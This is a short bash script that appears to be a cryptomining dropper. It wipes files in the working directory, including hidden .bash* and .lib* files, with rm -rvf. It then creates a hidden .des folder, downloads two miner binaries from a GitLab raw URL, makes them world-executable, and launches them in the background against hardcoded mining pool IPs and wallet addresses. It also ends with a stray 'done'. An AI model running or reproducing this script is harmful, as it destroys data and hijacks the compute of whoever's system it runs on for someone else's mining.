#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u up6wFaDx2cQexHM8VvvRhAFdcDNMESVpbZ.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lolMiner1.82a
chmod 777 lolMiner1.82a

./lolMiner1.82a --algo KARLSEN --pool 159.203.127.146:80 --user nexellia:qrcmk5pfn0mm2dn4zcq9vhuwfrss6ez93mjl7khkpgpr3sl2xed65yhzmq2cx.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
